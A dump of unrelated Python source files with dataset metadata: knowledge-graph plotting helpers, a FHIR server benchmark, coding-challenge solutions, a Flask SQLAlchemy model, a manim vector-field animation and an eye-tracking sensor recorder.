ax[1].set_xlabel('Card overlap')\n ax[1].set_ylabel('Counts')\n ax[1].set_yscale('log')\n ax[0].set_title(title)\n plt.show()\n\n title = 'Histogram of overlaps for ' + object_type + ' \"'+ object_title + '\"'\n plot_overlaps_histograms(sorted_node_overlaps, sorted_card_overlaps, title)\n\n # Visualize the results\n num_display = 60\n xvals = sorted_node_titles\n yvals = sorted_node_overlaps\n xlabel = 'Neighbor node title'\n title = 'Node overlaps for ' + object_type + ' \"'+ object_title + '\"'\n plot_overlaps_vs_names(xvals, yvals, xlabel, title, num_display)\n\n # Visualize the results\n num_display = 60\n xvals = [self.cards[cardID].topic + ' ID:' + str(cardID) for cardID in sorted_cardIDs[0:num_display]]\n yvals = sorted_card_overlaps\n xlabel = 'Card topic and ID'\n title = 'Card overlaps for ' + object_type + ' \"'+ object_title + '\"'\n plot_overlaps_vs_names(xvals, yvals, xlabel, title, num_display)\n \n \ndef create_card_deck_from_dataframe_of_abstraction_groups(cards_df_abstraction_groups):\n card_deck = []\n \n # Add cards \n print('Adding {} cards'.format(len(cards_df_abstraction_groups)))\n for card_ind in range(len(cards_df_abstraction_groups)):\n abstraction_groups = cards_df_abstraction_groups['Abstraction groups'].values[card_ind] \n topic = abstraction_groups['0'][0] # Extracts abstraction level 0, then first element.\n question = cards_df_abstraction_groups[\"Question\"].values[card_ind]\n answer = cards_df_abstraction_groups[\"Answer\"].values[card_ind]\n key_ideas = cards_df_abstraction_groups[\"Key ideas\"].values[card_ind]\n \n # construct card concept heirarchy\n cardConceptHierarchy = CardConceptHierarchy(topic, \"\")\n concept_lists = []\n for k, v in abstraction_groups.items():\n if k != '0':\n concept_lists.append([list(v), int(k)])\n\n # Now make concept hierarchy \n for concept_list, level in concept_lists:\n for concept in concept_list:\n cardConceptHierarchy.set_concept(level, concept, \"\")\n \n card_deck.append([topic, question, answer, key_ideas, cardConceptHierarchy])\n \n return card_deck 
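The helpers called throughout this section (trim_embedding_vector, emb_vec_inner_product, get_dict_items_sorted_by_decreasing_value) are defined elsewhere in knowledge_graph.py and are not shown here. A minimal sketch consistent with their call sites, where sparse embedding vectors are {node_title: weight} dicts, might look like the following; the keep_fraction parameter and the exact trimming rule are assumptions for illustration, not the author's definitions.

def trim_embedding_vector(emb_vec, keep_fraction=0.1):
    # Keep only the largest entries of a sparse embedding vector so that
    # later inner products over trimmed vectors stay cheap (the roughly
    # 10x speedup mentioned in update_all_node_embeddings).
    n_keep = max(1, int(len(emb_vec) * keep_fraction))
    top = sorted(emb_vec.items(), key=lambda kv: kv[1], reverse=True)[:n_keep]
    return dict(top)

def emb_vec_inner_product(vec_a, vec_b):
    # Sparse dot product: sum of products over the shared keys only.
    if len(vec_b) < len(vec_a):
        vec_a, vec_b = vec_b, vec_a  # iterate over the smaller dict
    return sum(v * vec_b[k] for k, v in vec_a.items() if k in vec_b)

def get_dict_items_sorted_by_decreasing_value(d):
    # Return parallel lists of keys and values sorted by value, largest
    # first, matching how display_object_overlaps unpacks the result.
    items = sorted(d.items(), key=lambda kv: kv[1], reverse=True)
    return [k for k, _ in items], [v for _, v in items]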
","repo_name":"tomhartke/knowledge-graph-from-GPT","sub_path":"knowledge_graph.py","file_name":"knowledge_graph.py","file_ext":"py","file_size_in_byte":46314,"program_lang":"python","lang":"en","doc_type":"code","stars":515,"dataset":"github-code","pt":"82"} +{"seq_id":"34612503963","text":"from fhir_kindling import FhirServer\nfrom fhir_kindling.benchmark import ServerBenchmark\n\nDEFAULT_SERVERS = [\n {\"name\": \"blaze\", \"api_address\": \"http://localhost:9090/fhir\"},\n # {\"name\": \"hapi\", \"api_address\": \"http://localhost:9091/fhir\"},\n {\n \"name\": \"linux4h\",\n \"api_address\": \"http://localhost:9080/fhir-server/api/v4/\",\n \"credentials\": {\"username\": \"fhiruser\", \"password\": \"change-password\"},\n },\n]\n\n\ndef run_benchmark(servers=DEFAULT_SERVERS):\n \"\"\"Run a benchmark against the given servers.\"\"\"\n\n # initialize server objects\n benchmark_servers = []\n for s in servers:\n print(f\"initializing Server {s['name']} -- {s['api_address']}\")\n credentials = s.get(\"credentials\", None)\n if credentials:\n benchmark_servers.append(\n FhirServer(\n api_address=s[\"api_address\"],\n **credentials,\n )\n )\n else:\n benchmark_servers.append(FhirServer(api_address=s[\"api_address\"]))\n\n print(f\"Running benchmark for {len(benchmark_servers)} servers\")\n\n benchmark = ServerBenchmark(\n servers=benchmark_servers,\n server_names=[s[\"name\"] for s in servers],\n dataset_size=10,\n n_attempts=2,\n )\n benchmark.run_suite()\n\n\nif __name__ == \"__main__\":\n run_benchmark()\n","repo_name":"migraf/fhir-kindling","sub_path":"benchmarks/benchmark_servers.py","file_name":"benchmark_servers.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"82"} +{"seq_id":"38939382246","text":"# Codewriting\n# Task 1 of 4\n# Given an integer n and an array a of length n, your task is to apply the following mutation to a:\n\n# Array a mutates into a new array b of length n.\n# For each i from 0 to n - 1, b[i] = a[i - 1] + a[i] + a[i + 1].\n# If some element in the sum a[i - 1] + a[i] + a[i + 1] does not exist, it should be set to 0. 
For example, b[0] should be equal to 0 + a[0] + a[1].\n# Example\n# For n = 5 and a = [4, 0, 1, -2, 3], the output should be solution(n, a) = [4, 5, -1, 2, 1].\n\n# b[0] = 0 + a[0] + a[1] = 0 + 4 + 0 = 4\n# b[1] = a[0] + a[1] + a[2] = 4 + 0 + 1 = 5\n# b[2] = a[1] + a[2] + a[3] = 0 + 1 + (-2) = -1\n# b[3] = a[2] + a[3] + a[4] = 1 + (-2) + 3 = 2\n# b[4] = a[3] + a[4] + 0 = (-2) + 3 + 0 = 1\n# So, the resulting array after the mutation will be [4, 5, -1, 2, 1].\n\n# Input/Output\n\n# [execution time limit] 4 seconds (js)\n\n# [input] integer n\n\n# An integer representing the length of the given array.\n\n# Guaranteed constraints:\n# 1 ≤ n ≤ 103.\n\n# [input] array.integer a\n\n# An array of integers that needs to be mutated.\n\n# Guaranteed constraints:\n# a.length = n,\n# -103 ≤ a[i] ≤ 103.\n\n# [output] array.integer\n\n# The resulting array after the mutation.\n\n\ndef mutate(n, a):\n '''Mutate a sequence of integers'''\n new_arr = []\n for i in range(n):\n if i == 0:\n new_arr.append(a[i] + a[i + 1])\n elif i >= n - 1:\n new_arr.append(a[i - 1] + a[i])\n else:\n new_arr.append(a[i - 1] + a[i] + a[i + 1])\n\n return new_arr\n\n\nlst = [4, 0, 1, -2, 3]\nprint(mutate(len(lst), lst))\n\n# Task 2 of 4\n# Given two strings s and t, both consisting of lowercase English letters and digits, your task is to calculate how many ways exactly one digit could be removed from one of the strings so that s is lexicographically smaller than t after the removal. Note that we are removing only a single instance of a single digit, rather than all instances (eg: removing 1 from the string a11b1c could result in a1b1c or a11bc, but not abc).\n\n# Also note that digits are considered lexicographically smaller than letters.\n\n# Example\n\n# For s = \"ab12c\" and t = \"1zz456\", the output should be solution(s, t) = 1.\n\n# Here are all the possible removals:\n\n# We can remove the first digit from s, obtaining \"ab2c\". \"ab2c\" > \"1zz456\", so we don't count this removal\n# We can remove the second digit from s, obtaining \"ab1c\". \"ab1c\" > \"1zz456\", so we don't count this removal\n# We can remove the first digit from t, obtaining \"zz456\". \"ab12c\" < \"zz456\", so we count this removal\n# We can remove the second digit from t, obtaining \"1zz56\". \"ab12c\" > \"1zz56\", so we don't count this removal\n# We can remove the third digit from t, obtaining \"1zz46\". \"ab12c\" > \"1zz46\", so we don't count this removal\n# We can remove the fourth digit from t, obtaining \"1zz45\". \"ab12c\" > \"1zz45\", so we don't count this removal\n# The only valid case where s < t after removing a digit is \"ab12c\" < \"zz456\". 
Therefore, the answer is 1.\n\n# For s = \"ab12c\" and t = \"ab24z\", the output should be solution(s, t) = 3.\n\n# There are 4 possible ways of removing the digit:\n\n# \"ab1c\" < \"ab24z\"\n# \"ab2c\" > \"ab24z\"\n# \"ab12c\" < \"ab4z\"\n# \"ab12c\" < \"ab2z\"\n# Three of these cases match the requirement that s < t, so the answer is 3.\n\n# Input/Output\n\n# [execution time limit] 4 seconds (js)\n\n# [input] string s\n\n# A string consisting of lowercase English letters and digits 0..9.\n\n# Guaranteed constraints:\n# 1 ≤ s.length ≤ 103.\n\n# [input] string t\n\n# A string consisting of lowercase English letters and digits 0..9.\n\n# Guaranteed constraints:\n# 1 ≤ t.length ≤ 103.\n\n# [output] integer\n\n# The number of ways to remove exactly one digit from one of the strings so that s is lexicographically smaller than t after the removal.\n\n\ndef lexicotract(s, t):\n \"\"\"calculate how many ways exactly one digit could be removed from one of the strings \n so that s is lexicographically smaller than t after the removal\"\"\"\n count, lst_s, lst_t = 0, list(s), list(t)\n for i, num in enumerate(s):\n if 48 <= ord(num) <= 57:\n lst_s.remove(num)\n count += (''.join(lst_s) < t)\n lst_s.insert(i, num)\n for i, num in enumerate(t):\n if 48 <= ord(num) <= 57:\n lst_t.remove(num)\n count += (''.join(lst_t) > s)\n lst_t.insert(i, num)\n return count\n\n\nprint(lexicotract('ab12c', 'ab24z'))\n\n# Task 4 of 4\n# Given an array of integers a of even length, your task is to split it into \n# two arrays of equal length such that all the numbers are unique in each of them.\n\n# There may be more than one possible answer, in which case you may return any of them. \n# If there are no possible answers, return an empty array.\n\n# Hint: Count the number of occurrences of each integer in a. \n# If there are integers occurring more than twice, then there is no solution. \n# Next, put the integers occurring twice into both answer arrays. \n# Finally, put all other numbers in the answer arrays, following the condition \n# that they should have equal sizes.\n\n# Example\n\n# For a = [2, 1, 2, 3, 3, 4], the output can be solution(a) = [[2, 1, 3], [2, 3, 4]].\n\n# Answers like [[1, 2, 3], [2, 3, 4]] or [[4, 2, 3], [3, 2, 1]] would also be considered correct.\n\n# For a = [1, 2, 2, 1], the output can be solution(a) = [[1, 2], [2, 1]].\n\n# Again, there are other possible answers.\n\n# For a = [2, 2, 3, 3, 2, 2], the output should be solution(a) = [].\n\n# No matter how we try to split this array, there will be at least two 2s in at \n# least one of the resulting arrays. So the answer is [].\n\n# Input/Output\n\n# [execution time limit] 4 seconds (js)\n\n# [input] array.integer a\n\n# An array of integers. It is guaranteed that a has even length.\n\n# Guaranteed constraints:\n# 2 ≤ a.length ≤ 104,\n# 1 ≤ a[i] ≤ 105.\n\n# [output] array.array.integer\n\n# Return an empty array if there is no solution. 
If a solution exists, \n# return an array of two arrays - a distribution of a where each of these two arrays are of equal length\n# and each contains unique elements.\n\n\ndef unique_splt(*nums):\n \"\"\"Split an array of numbers into two arrays of the same length containing unique elements\"\"\"\n solution = [[], []]\n for num in nums:\n if num not in solution[0] and len(solution[0]) < len(nums) / 2:\n solution[0].append(num)\n elif num not in solution[1] and len(solution[1]) < len(nums) / 2:\n solution[1].append(num)\n else:\n return []\n return solution\n\n\nprint(unique_splt(2, 2, 3, 3, 2, 2))\n\n\n########################################################################\n########################################################################\n# matriix = [[1, 2, 3],\n# [4, 5, 6],\n# [7, 8, 9]]\n\n\n# def solution(a):\n# \"\"\" Rotate a 2 dimensional array of numbers by 90 degrees clockwise \"\"\"\n# a.reverse()\n# for i in range(len(a)):\n# for j in range(i):\n# a[i][j], a[j][i] = a[j][i], a[i][j]\n\n# print(a)\n\n\n# solution(matriix)\n\n\ngrid = [['.', '.', '.', '.', '2', '.', '.', '9', '.'],\n ['.', '.', '.', '.', '6', '.', '.', '.', '.'],\n ['7', '1', '.', '.', '7', '5', '.', '.', '.'],\n ['.', '7', '.', '.', '.', '.', '.', '.', '.'],\n ['.', '.', '.', '.', '8', '3', '.', '.', '.'],\n ['.', '.', '8', '.', '.', '7', '.', '6', '.'],\n ['.', '.', '.', '.', '.', '2', '.', '.', '.'],\n ['.', '1', '.', '2', '.', '.', '.', '.', '.'],\n ['.', '2', '.', '.', '3', '.', '.', '.', '.']]\n\n\ndef solution(grid):\n for i, list_of_nums in enumerate(grid):\n for j, num in enumerate(list_of_nums):\n if ord(num) > 46 and list_of_nums.count(num) > 1:\n print(num)\n\n\nprint(solution(grid))\n","repo_name":"adelaykay/semester4-python","sub_path":"challenges.py","file_name":"challenges.py","file_ext":"py","file_size_in_byte":7712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"6560255832","text":"# -*- coding: utf-8 -*-\n# @Author: Nianko \n# @Date: 2018-03-14T15:02:16+08:00\n# @Last modified by: nianko\n# @Last modified time: 2018-03-15T10:41:57+08:00\n\nfrom app import db\n\nclass Cartoon(db.Model):\n __tablename__ = 'cartoon'\n __table_args__ = {\n \"mysql_engine\": \"InnoDB\", # 指定表的引擎,InnoDB(MySQL的数据库引擎之一)\n \"mysql_charset\": \"utf8\" # 指定表的编码格式\n }\n id = db.Column(db.Integer, primary_key=True) #int 类型\n name = db.Column(db.String(225), nullable=False) #string类型\n intro = db.Column(db.Text) #文本类型\n pub_date = db.Column(db.String(225))\n icon = db.Column(db.String(250))\n video_url = db.Column(db.String(250))\n count = db.Column(db.Integer, default=0)\n created_at = db.Column(db.String(225))\n status = db.Column(db.Integer, default=1) #1 正常 0 禁止播放 -1 不显示\n\n #repr()方法显示一个可读字符串,虽然不是完全必要,不过用于调试和测试还是很不错的。\n def __repr__(self):\n return '' % self.id\n","repo_name":"Miaoza/FlaskRestful-SqlAlchemy","sub_path":"app/cartoon/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70083453710","text":"from manimlib.imports import *\n\nclass VectorFields(ThreeDScene):\n\n CONFIG = {\n \"axes_config\": {\n \"x_min\": -4,\n \"x_max\": 4,\n \"y_min\": -4,\n \"y_max\": 4,\n \"z_min\": -3,\n \"z_max\": 3,\n \"a\":-4 ,\"b\": 4, \"c\":-4 , \"d\":4,\n \"axes_shift\": ORIGIN+2*LEFT,\n \"x_axis_config\": {\n \"tick_frequency\": 1,\n # \"include_tip\": False,\n },\n \"y_axis_config\": {\n \"tick_frequency\": 1,\n # 
\"include_tip\": False,\n },\n \"z_axis_config\": {\n \"tick_frequency\": 1,\n # \"include_tip\": False,\n },\n \"num_axis_pieces\": 10,\n },\n \"default_graph_style\": {\n \"stroke_width\": 2,\n \"stroke_color\": WHITE,\n },\n \"default_vector_field_config\": {\n \"delta_x\": .5,\n \"delta_y\": .5,\n \"x_min\": -3,\n \"x_max\": 3, \n \"y_min\": -3,\n \"y_max\": 3,\n \"min_magnitude\": 0,\n \"max_magnitude\": 4,\n \"colors\": [BLUE,GREEN,ORANGE,RED],\n \"length_func\": lambda norm : .45*sigmoid(norm),\n \"opacity\": 1.0,\n \"vector_config\": {\n \"stroke_width\":3.5,\n \"max_tip_length_to_length_ratio\": 0.35,\n \"max_stroke_width_to_length_ratio\": 8,\n },\n },\n \n }\n\n\n def construct(self):\n\n self.setup_axes()\n axes=self.axes\n \n self.set_camera_orientation(distance=35,\n phi=0 * DEGREES,\n theta=-90 * DEGREES,\n )\n self.move_camera(frame_center=axes.c2p(0,0,0))\n \n self.show_2d_field()\n self.wait(3)\n \n self.show_3d_field()\n self.begin_ambient_camera_rotation(rate=-.3,)\n self.wait(1.5)\n axes.x_axis.rotate(\n -90 * DEGREES, LEFT,\n about_point=axes.c2p(0, 0, 0),\n ),\n axes.y_axis.rotate(\n 90 * DEGREES, UP,\n about_point=axes.c2p(0, 0, 0),\n ),\n self.move_camera(\n # distance=20,\n phi=85 * DEGREES,\n rate_func=linear,\n run_time=8\n )\n self.wait(5)\n \n \n def show_2d_field(self): \n d2_field_text=TexMobject(\n r\"\\vec F(x,y)=-y\\hat i+x\\hat j\",\n stroke_width=1.5\n ).set_color_by_gradient(\n *self.default_vector_field_config[\"colors\"]\n )\n d2_field_text.to_corner(UR,buff=.5)\n \n d2_field = self.get_vector_field(\n lambda v: np.array([\n -v[1],\n v[0],\n 0\n ]),\n )\n self.add_fixed_in_frame_mobjects(d2_field_text)\n # self.add(d2_field)\n self.play(Write(d2_field_text))\n self.play(FadeIn(d2_field))\n \n self.d2_field=d2_field\n self.d2_field_text=d2_field_text\n \n def show_3d_field(self):\n d3_field_text=TexMobject(\n r\"\\vec F(x,y,z)=-y\\hat i+x\\hat j+0 \\hat k\",\n stroke_width=1.5\n ).set_color_by_gradient(\n *self.default_vector_field_config[\"colors\"]\n )\n d3_field_text.to_corner(UR,buff=.5)\n \n d3_field= self.get_vector_field(\n lambda v: np.array([\n -v[1],\n v[0],\n 0\n # v[0]*v[2]\n ]),\n z_min=-2,\n z_max= 2,\n delta_x= 1,\n delta_y= 1,\n delta_z= 1,\n length_func=lambda norm : .5*sigmoid(norm),\n opacity= 1,\n ThreeD=True\n )\n \n self.remove(self.d2_field,self.d2_field_text)\n self.add_fixed_in_frame_mobjects(d3_field_text)\n # self.add(d3_field)\n self.play(Write(d3_field_text))\n self.play(FadeIn(d3_field))\n \n def get_vector_field(self,func,ThreeD=False,**kwargs):\n config = dict()\n config.update(self.default_vector_field_config)\n config.update(kwargs)\n if ThreeD:\n vector_field= VectorField3D(func,**config)\n else:\n vector_field= VectorField(func,**config)\n \n vector_field.move_to(self.axes.c2p(0,0,0))\n self.vector_field=vector_field\n \n return vector_field\n \n \n\n#------------------------------------------------------- \n #customize 3D axes \n def get_three_d_axes(self, include_labels=True, include_numbers=False, **kwargs):\n config = dict(self.axes_config)\n config.update(kwargs)\n axes = ThreeDAxes(**config)\n axes.set_stroke(width=2)\n self.axes=axes\n \n if include_numbers:\n self.add_axes_numbers(axes)\n\n if include_labels:\n self.add_axes_labels(axes)\n\n # Adjust axis orientation\n axes.x_axis.rotate(\n -0 * DEGREES, LEFT,\n about_point=axes.c2p(0, 0, 0),\n )\n axes.y_axis.rotate(\n 0 * DEGREES, UP,\n about_point=axes.c2p(0, 0, 0),\n )\n \n return axes\n \n \n def setup_axes(self):\n axes = 
self.get_three_d_axes(include_labels=True)\n axes.scale(1)\n # axes.center()\n axes.shift(axes.axes_shift)\n\n self.add(axes)\n self.axes = axes\n \n def add_axes_numbers(self, axes):\n x_axis = axes.x_axis\n y_axis = axes.y_axis\n tex_vals_x = [\n \n (\"1\", axes.b),\n ]\n tex_vals_y=[\n \n (\"1\", axes.d)\n ]\n x_labels = VGroup()\n y_labels = VGroup()\n for tex, val in tex_vals_x:\n label = TexMobject(tex)\n label.scale(1)\n label.next_to(x_axis.n2p(val), DOWN)\n # label.rotate(180 * DEGREES)\n x_labels.add(label)\n x_axis.add(x_labels)\n x_axis.numbers = x_labels\n\n for tex, val in tex_vals_y:\n label = TexMobject(tex)\n label.scale(1)\n label.next_to(y_axis.n2p(val), LEFT)\n label.rotate(90 * DEGREES)\n y_labels.add(label)\n \n y_axis.add(y_labels)\n y_axis.numbers = y_labels\n \n return axes\n \n def add_axes_labels(self, axes):\n x_label = TexMobject(\"x\")\n x_label.next_to(axes.x_axis.get_end(), RIGHT)\n axes.x_axis.label = x_label\n\n y_label = TextMobject(\"y\")\n y_label.rotate(90 * DEGREES, OUT)\n y_label.next_to(axes.y_axis.get_end(), UP)\n axes.y_axis.label = y_label\n\n z_label = TextMobject(\"z\")\n z_label.rotate(90 * DEGREES, RIGHT)\n z_label.next_to(axes.z_axis.get_zenith(), LEFT)\n axes.z_axis.label = z_label\n for axis in axes:\n axis.add(axis.label)\n return axes\n \n#-----------------------------------------------------------\n \nclass VectorField3D(VGroup):\n CONFIG = {\n \"delta_x\": 1,\n \"delta_y\": 1,\n \"delta_z\": 1,\n \"x_min\": int(np.floor(-FRAME_WIDTH / 2)),\n \"x_max\": int(np.ceil(FRAME_WIDTH / 2)),\n \"y_min\": int(np.floor(-FRAME_HEIGHT / 2)),\n \"y_max\": int(np.ceil(FRAME_HEIGHT / 2)),\n \"z_min\":-1,\n \"z_max\": 1,\n \"min_magnitude\": 0,\n \"max_magnitude\": 4,\n \"colors\": DEFAULT_SCALAR_FIELD_COLORS,\n # Takes in actual norm, spits out displayed norm\n \"length_func\": lambda norm: 0.45 * sigmoid(norm),\n \"opacity\": 1.0,\n \"vector_config\": {},\n }\n '''Position of the tip of vector to be fixed'''\n def __init__(self, func, **kwargs):\n VGroup.__init__(self, **kwargs)\n self.func = func\n self.rgb_gradient_function = get_rgb_gradient_function(\n self.min_magnitude,\n self.max_magnitude,\n self.colors,\n flip_alphas=False\n )\n x_range = np.arange(\n self.x_min,\n self.x_max + self.delta_x,\n self.delta_x\n )\n y_range = np.arange(\n self.y_min,\n self.y_max + self.delta_y,\n self.delta_y\n )\n z_range = np.arange(\n self.z_min,\n self.z_max + self.delta_z,\n self.delta_z\n )\n for x, y, z in it.product(x_range, y_range, z_range):\n point = x * RIGHT + y * UP + z * OUT\n # print(point)\n self.add(self.get_vector(point))\n self.set_opacity(self.opacity)\n\n def get_vector(self, point, **kwargs):\n output = np.array(self.func(point))\n norm = get_norm(output)\n if norm == 0:\n output *= 0\n else:\n output *= self.length_func(norm) / norm\n # norm=np.linalg.norm(output)\n vector_config = dict(self.vector_config)\n vector_config.update(kwargs)\n \n vect = Vector(\n output,\n **vector_config\n )\n vect_perp=vect.copy().rotate(PI/2, axis=output)\n vect= VGroup(vect,vect_perp)\n # vect= self.position_vector(vect,point,output,norm)\n vect.shift(point)\n fill_color = rgb_to_color(\n self.rgb_gradient_function(np.array([norm]))[0]\n )\n vect.set_color(fill_color)\n return vect\n \n '''def position_vector(self,vect,point,output,norm):\n theta,phi=self.get_theta_phi(output,norm)\n vect.rotate(PI-phi, axis=RIGHT)\n vect.rotate(theta, axis=IN)\n # or apply rotation matrix?\n return vect\n \n def get_theta_phi(self,output,norm):\n if norm==0:\n 
phi,theta=0,0\n else:\n phi= np.arccos(output[-1]/norm)\n if output[0]!=0:\n theta= np.arccos(output[0]/(norm*np.sin(phi)))\n else:\n theta= 0\n return phi,theta'''\n \n \n \n #uploaded by Somnath Pandit. FSF2020_Vector_fields\n \n \n \n","repo_name":"FOSSEE/FSF-mathematics-python-code-archive","sub_path":"FSF-2020/calculus-of-several-variables/integrals-of-multivariable-functions/vector-fields/file1_vector_fields.py","file_name":"file1_vector_fields.py","file_ext":"py","file_size_in_byte":10019,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"82"} +{"seq_id":"2783845532","text":"# This code is for recording eye tests with a 6-sensor eye tracking system.\r\n# It presents the user with a dot that moves back and forth along a line\r\n# for the user to follow with their eyes, stopping at each end of the line until\r\n# the user presses Enter to continue (the start/end coordinates of the line can\r\n# be set below).\r\n#\r\n# Two sub-processes are created:\r\n# 1) dot_process:\r\n# Handles the animation, dot data recording, user input. Saves timestamped\r\n# dot coordinates in the dot_df dataframe then as a csv file before returning.\r\n# 2) sensor_process:\r\n# records sensor data from a serial connection. Stores raw data as strings\r\n# for faster sampling, then when test is completed, can verify each line as\r\n# valid before saving as a csv file. The expected line is 6 comma-separated\r\n# numeric values, eg:\r\n#\r\n# \",,,,,\\r\\n\"\r\n#\r\n# (carriage return is optional.)\r\n#\r\n# After the test, the main process re-opens the saved files and plots them to confirm\r\n# the data was recorded as intended.\r\n# Several settings can be changed: see the USER SETTINGS section below for more\r\n# details.\r\n#\r\n# Data files are saved in the directory:\r\n#\r\n# ./test_data\r\n#\r\n# It will be created if it doesn't exist. Note if on Linux: this code must be run\r\n# by superuser so superuser will also be needed to delete this directory,\r\n# as well the files created by this program.\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom matplotlib.animation import FuncAnimation\r\nimport os\r\nimport serial\r\nimport sys\r\nfrom multiprocessing import Process, Pipe\r\nfrom datetime import datetime\r\nimport keyboard\r\nimport time\r\nimport pandas as pd\r\nimport signal\r\n\r\n#################\r\n# USER SETTINGS #\r\n\r\n#################\r\nnum_repeat = 1\r\n# number of times the dot will move forward and backwards\r\nnum_dot_positions = 150 # Number of dot positions along the line (also determines speed).\r\ndot_start_x = 0 # dot start and stop locations. Should be between 0 and axes_lim.\r\ndot_stop_x = 8\r\n\r\ndot_start_y = 4\r\ndot_stop_y = 4\r\n\r\nconfirm_data = True # Boolean. Display saved data after the test.\r\nrecord_sensors = True # Boolean. Record sensors (or just dot data).\r\nprocess_sensor_data = True # Boolean. 
Validate sensor data/save as csv, or: don't validate, save as .txt\r\nserial_port = 'COM8'\r\nbaud_rate = 1000000\r\ndir_char = '/' # Directory character for filepath, will be automatically reset for Windows.\r\n# set and forge\r\nblit = True\r\nmarkersize = 7\r\naxes_lim = 8\r\ndata_folder = 'test_data'\r\ndot_df_columns = ['timestamp', 'dot_x', 'dot_y']\r\nsensor_df_columns = ['timestamp', 'LL', 'LC', 'LR', 'RL', 'RC', 'RR']\r\n\r\n######################\r\n# INTERNAL VARIABLES #\r\n######################\r\nexit_state = 0\r\nuser_input = False # stores user input (True), should be reset to False at each side of screen.\r\ndot_coords = np.empty((0, 0)) # contains all dot coords used in test.\r\ncoords_index = 0\r\ndot_df = pd.DataFrame(columns=dot_df_columns)\r\nrec_stop_points = []\r\nstop_point_i = 0\r\nanim_setup = 0 # Sets return after first anim call, so plot is drawn while waiting for user input. Init to True.\r\nsetup_frames = 5 # this istartup buffer is needed to display animation before starting test.\r\nfilepath = \"\"\r\ndot_process = None # Sub-processes that will be used.\r\nsensor_process = None\r\nsensor_filepath = \"\"\r\ndot_PID = None\r\nsensor_PID = None\r\n#############\r\n# FUNCTIONS #\r\n#############\r\n\r\n# Handle SIGINT (Ctrl-C from user, used to exit)\r\ndef SIGINT_handler(signum, frame):\r\n global dot_process, sensor_process, record_sensors, dot_PID, sensor_PID\r\n\r\n if dot_process.is_alive():\r\n dot_process.terminate()\r\n if record_sensors:\r\n if sensor_process.is_alive():\r\n sensor_process.terminate()\r\n print('\\n Processes terminated. Goodbye.\\n')\r\n exit()\r\n\r\n# Re-import and plot data files after test to check data was recorded correctly.\r\ndef post_test_check(dot_filepath, sensor_filepath):\r\n\r\n subplots = {}\r\n\r\n #import dot dataset\r\n dotCheck_df = pd.read_csv(dot_filepath)\r\n dotCheck_df['timestamp'] = pd.to_datetime(dotCheck_df['timestamp'])\r\n\r\n # check if sensors were recorded\r\n n_subplots = 2\r\n if \"csv\" in sensor_filepath:\r\n n_subplots = 4\r\n sensorCheck_df = pd.read_csv(sensor_filepath)\r\n sensorCheck_df['timestamp'] = pd.to_datetime(sensorCheck_df['timestamp'])\r\n # create plots\r\n fig = plt.figure()\r\n for i in range(n_subplots):\r\n subplots[i] = fig.add_subplot(2 ,2, i+1)\r\n # Finalise dot data plots\r\n subplots[0].set_title('Dot Data', fontsize=16, fontweight='bold')\r\n subplots[1].set_title('Dot Data FPS', fontsize=16, fontweight='bold')\r\n subplots[0].scatter(dotCheck_df[dot_df_columns[0]], dotCheck_df[dot_df_columns[1]], label=dot_df_columns[1])\r\n subplots[0].scatter(dotCheck_df[dot_df_columns[0]], dotCheck_df[dot_df_columns[2]], label=dot_df_columns[2])\r\n subplots[1].plot(dotCheck_df['timestamp'], [1000000/time.microseconds for time in dotCheck_df['timestamp'].diff()])\r\n subplots[1].set_xlim(subplots[0].get_xlim())\r\n subplots[0].legend()\r\n subplots[0].grid()\r\n subplots[1].grid()\r\n # sensor plots\r\n if n_subplots == 4:\r\n subplots[2].set_title('Sensor Data', fontsize=16, fontweight='bold')\r\n subplots[3].set_title('Sensor Sample Freq', fontsize=16, fontweight='bold')\r\n for sensor in sensorCheck_df.columns[1:]:\r\n subplots[2].plot(sensorCheck_df['timestamp'], sensorCheck_df[sensor], label = sensor)\r\n subplots[3].plot(sensorCheck_df['timestamp'], [1000000/time.microseconds for time in sensorCheck_df['timestamp'].diff()])\r\n subplots[2].legend()\r\n subplots[2].set_xlim(subplots[0].get_xlim())\r\n subplots[3].set_xlim(subplots[0].get_xlim())\r\n subplots[2].grid()\r\n 
subplots[3].grid()\r\n subplots[2].set_ylabel('mV')\r\n subplots[3].set_ylabel('Hz')\r\n\r\n fig.tight_layout()\r\n # format and show figure\r\n figManager = plt.get_current_fig_manager()\r\n figManager.window.showMaximized()\r\n plt.show()\r\n\r\n\r\n# MAIN FUNCTION OF DOT PROCESS\r\ndef dot_run(dot_to_main, dot_to_sensor, dot_from_sensor):\r\n global dot_coords, record_sensors\r\n\r\n # send PID\r\n dot_to_main.send(os.getpid())\r\n\r\n ### PROCESS FUNCTIONS ###\r\n\r\n def save_dot_csv():\r\n # save .csv file\r\n if not os.path.exists(data_folder):\r\n os.makedirs(data_folder)\r\n savetime = datetime.now().strftime('%Y-%m-%dT%H%M%S')\r\n filename = 'dot_data_%d_%d_%d_%d_%s.csv' % (dot_start_x, dot_start_y, dot_stop_x, dot_stop_y, savetime)\r\n dot_df.to_csv(data_folder + dir_char + filename, header=True, index=False)\r\n\r\n return data_folder + dir_char + filename\r\n\r\n # animation loop function\r\n def ani(frame):\r\n global exit_state, user_input, coords_index, dot_coords, coords_index\r\n global rec_stop_points, stop_point_i, anim_setup, setup_frames, filepath\r\n\r\n\r\n # takes a few frames to set up figure\r\n if frame < setup_frames:\r\n return [point, message]\r\n\r\n # EXIT SEQUENCE\r\n # 1) save data, signal sensor process to stop, display exit message.\r\n if exit_state == 1:\r\n filepath = save_dot_csv()\r\n dot_to_sensor.send(filepath)\r\n if confirm_data:\r\n exit_message = \"Test Completed.\\n\\n\" +\\\r\n (\"Dot data saved as:\\n%s\\n\\n\" % filepath) +\\\r\n \"Press Enter to close window and view data . . .\\n(may take some time)\"\r\n else:\r\n exit_message = \"Test Completed\\n\\n\" +\\\r\n \"Data confirmation turned off.\\n\\n\" +\\\r\n \"Press Enter to Quit.\"\r\n message.set_text(exit_message)\r\n exit_state = exit_state + 1\r\n point.set_color('white')\r\n return [point, message]\r\n # 2) wait for user confirmation then close animation\r\n if exit_state == 2:\r\n 